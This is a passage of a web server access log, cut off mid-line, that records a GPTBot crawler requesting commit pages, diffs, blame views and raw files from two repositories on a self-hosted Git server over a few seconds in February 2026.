GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:13:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 74.7.227.38] [Length 15599] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" +[17/Feb/2026:13:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d.diff" [Client 74.7.227.38] [Length 2501] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13140] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" +[17/Feb/2026:13:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 22229] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 22232] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 22960] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" +[17/Feb/2026:13:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" [Client 74.7.227.38] [Length 14801] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" [Client 74.7.227.38] [Length 11946] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" [Client 74.7.227.38] [Length 11657] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 74.7.227.38] [Length 7508] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 7501] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 74.7.227.38] [Length 7494] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12934] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" +[17/Feb/2026:13:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" +[17/Feb/2026:13:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" +[17/Feb/2026:13:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 213404] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 11102] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" +[17/Feb/2026:13:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" [Client 74.7.227.38] [Length 10980] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" [Client 74.7.227.38] [Length 11039] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:13:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" [Client 74.7.227.38] [Length 19732] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:13:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" [Client 74.7.227.38] [Length 7486] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 74.7.227.38] [Length 11267] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" +[17/Feb/2026:13:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 74.7.227.38] [Length 10221] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" +[17/Feb/2026:13:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9953] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a.diff" [Client 74.7.227.38] [Length 3312] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" +[17/Feb/2026:13:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" +[17/Feb/2026:13:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" +[17/Feb/2026:13:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" [Client 74.7.227.38] [Length 9992] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" +[17/Feb/2026:13:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" [Client 74.7.227.38] [Length 22472] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" +[17/Feb/2026:13:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" +[17/Feb/2026:13:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" +[17/Feb/2026:13:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" +[17/Feb/2026:13:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" +[17/Feb/2026:13:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a.patch" [Client 74.7.227.38] [Length 3773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" [Client 74.7.227.38] [Length 11804] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" +[17/Feb/2026:13:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584.diff" [Client 74.7.227.38] [Length 797987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8.patch" [Client 74.7.227.38] [Length 613112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8.diff" [Client 74.7.227.38] [Length 547811] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9949] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" [Client 74.7.227.38] [Length 15173] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 74.7.227.38] [Length 15828] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 74.7.227.38] [Length 11275] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" [Client 74.7.227.38] [Length 19703] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" +[17/Feb/2026:13:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" +[17/Feb/2026:13:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 24131] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" +[17/Feb/2026:13:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:13:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10881] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist" +[17/Feb/2026:13:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 74.7.227.38] [Length 7501] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13110] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" +[17/Feb/2026:13:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13143] [Gzip 3.48] [Sent-to 